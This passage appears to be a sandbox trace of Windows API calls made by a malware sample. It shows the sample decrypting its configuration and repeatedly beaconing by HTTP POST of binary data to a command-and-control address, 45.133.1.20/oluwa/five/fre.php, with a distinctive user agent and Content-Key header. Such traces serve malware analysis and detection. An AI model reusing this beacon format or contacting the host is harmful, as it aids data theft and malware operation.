(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.812] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.813] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.813] GetProcessHeap () returned 0x6a0000 [0287.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0287.814] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.814] GetProcessHeap () returned 0x6a0000 [0287.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0287.814] GetProcessHeap () returned 0x6a0000 [0287.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.815] GetProcessHeap () returned 0x6a0000 [0287.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0287.815] GetProcessHeap () returned 0x6a0000 [0287.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0287.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.816] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.823] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0287.831] GetProcessHeap () returned 0x6a0000 [0287.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0287.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.833] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0287.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.834] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.835] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.835] GetProcessHeap () returned 0x6a0000 [0287.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0287.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.837] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0287.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.839] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0287.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.840] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0287.840] GetProcessHeap () returned 0x6a0000 [0287.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0287.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.841] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0287.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.842] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0287.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.844] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0287.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.845] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0287.845] GetProcessHeap () returned 0x6a0000 [0287.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0287.845] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0287.845] GetProcessHeap () returned 0x6a0000 [0287.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0287.845] socket (af=2, type=1, protocol=6) returned 0xaa4 [0287.846] connect (s=0xaa4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0287.877] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0287.877] GetProcessHeap () returned 0x6a0000 [0287.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0287.877] GetProcessHeap () returned 0x6a0000 [0287.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0287.878] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.879] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.879] GetProcessHeap () returned 0x6a0000 [0287.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5b00 [0287.879] GetProcessHeap () returned 0x6a0000 [0287.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.880] GetProcessHeap () returned 0x6a0000 [0287.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0287.880] GetProcessHeap () returned 0x6a0000 [0287.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0287.881] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0287.882] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.882] GetProcessHeap () returned 0x6a0000 [0287.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0287.882] GetProcessHeap () returned 0x6a0000 [0287.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0287.883] send (s=0xaa4, buf=0x6bd460*, len=242, flags=0) returned 242 [0287.884] send (s=0xaa4, buf=0x6bb998*, len=159, flags=0) returned 159 [0287.884] GetProcessHeap () returned 0x6a0000 [0287.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0287.884] recv (in: s=0xaa4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0287.958] GetProcessHeap () returned 0x6a0000 [0287.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0287.959] GetProcessHeap () returned 0x6a0000 [0287.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0287.959] GetProcessHeap () returned 0x6a0000 [0287.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5b00 | out: hHeap=0x6a0000) returned 1 [0287.960] GetProcessHeap () returned 0x6a0000 [0287.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0287.961] closesocket (s=0xaa4) returned 0 [0287.962] GetProcessHeap () returned 0x6a0000 [0287.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0287.962] GetProcessHeap () returned 0x6a0000 [0287.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0287.962] GetProcessHeap () returned 0x6a0000 [0287.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0287.963] GetProcessHeap () returned 0x6a0000 [0287.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0287.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbe4) returned 0xaa4 [0287.965] Sleep (dwMilliseconds=0xea60) [0287.968] GetProcessHeap () returned 0x6a0000 [0287.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0287.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0287.991] GetProcessHeap () returned 0x6a0000 [0287.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8238 [0287.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.992] CryptImportKey (in: hProv=0x6beb90, pbData=0x6d8238, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0287.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.993] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.994] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.994] GetProcessHeap () returned 0x6a0000 [0287.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8238 | out: hHeap=0x6a0000) returned 1 [0287.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0287.996] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0287.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.000] CryptDestroyKey (hKey=0x6ad020) returned 1 [0288.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.001] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0288.001] GetProcessHeap () returned 0x6a0000 [0288.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.008] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.009] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.010] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.012] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.012] GetProcessHeap () returned 0x6a0000 [0288.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0288.012] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.012] GetProcessHeap () returned 0x6a0000 [0288.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0288.013] GetProcessHeap () returned 0x6a0000 [0288.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.013] GetProcessHeap () returned 0x6a0000 [0288.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0288.013] GetProcessHeap () returned 0x6a0000 [0288.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0288.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.014] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.028] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0288.038] GetProcessHeap () returned 0x6a0000 [0288.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0288.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.039] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0288.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.040] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.041] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.041] GetProcessHeap () returned 0x6a0000 [0288.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0288.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.046] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0288.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.048] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0288.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.049] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0288.049] GetProcessHeap () returned 0x6a0000 [0288.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.051] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0288.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.052] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0288.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.053] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0288.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.054] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0288.054] GetProcessHeap () returned 0x6a0000 [0288.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0288.055] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0288.055] GetProcessHeap () returned 0x6a0000 [0288.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0288.055] socket (af=2, type=1, protocol=6) returned 0xaa8 [0288.055] connect (s=0xaa8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0288.078] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0288.078] GetProcessHeap () returned 0x6a0000 [0288.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0288.078] GetProcessHeap () returned 0x6a0000 [0288.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0288.079] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.080] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.080] GetProcessHeap () returned 0x6a0000 [0288.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d82f0 [0288.080] GetProcessHeap () returned 0x6a0000 [0288.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.080] GetProcessHeap () returned 0x6a0000 [0288.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0288.081] GetProcessHeap () returned 0x6a0000 [0288.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0288.081] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.082] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.082] GetProcessHeap () returned 0x6a0000 [0288.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0288.082] GetProcessHeap () returned 0x6a0000 [0288.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.083] send (s=0xaa8, buf=0x6bd460*, len=242, flags=0) returned 242 [0288.084] send (s=0xaa8, buf=0x6bb998*, len=159, flags=0) returned 159 [0288.084] GetProcessHeap () returned 0x6a0000 [0288.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0288.084] recv (in: s=0xaa8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0288.158] GetProcessHeap () returned 0x6a0000 [0288.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0288.159] GetProcessHeap () returned 0x6a0000 [0288.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0288.160] GetProcessHeap () returned 0x6a0000 [0288.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d82f0 | out: hHeap=0x6a0000) returned 1 [0288.160] GetProcessHeap () returned 0x6a0000 [0288.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0288.161] closesocket (s=0xaa8) returned 0 [0288.161] GetProcessHeap () returned 0x6a0000 [0288.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0288.162] GetProcessHeap () returned 0x6a0000 [0288.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.162] GetProcessHeap () returned 0x6a0000 [0288.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0288.162] GetProcessHeap () returned 0x6a0000 [0288.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0288.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x438) returned 0xaa8 [0288.167] Sleep (dwMilliseconds=0xea60) [0288.211] GetProcessHeap () returned 0x6a0000 [0288.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0288.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.213] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0288.244] GetProcessHeap () returned 0x6a0000 [0288.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0288.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.245] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0288.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.247] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.248] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.248] GetProcessHeap () returned 0x6a0000 [0288.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0288.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.250] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0288.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.252] CryptDestroyKey (hKey=0x6ad060) returned 1 [0288.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.254] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0288.254] GetProcessHeap () returned 0x6a0000 [0288.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.255] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.257] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.263] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.264] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.264] GetProcessHeap () returned 0x6a0000 [0288.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 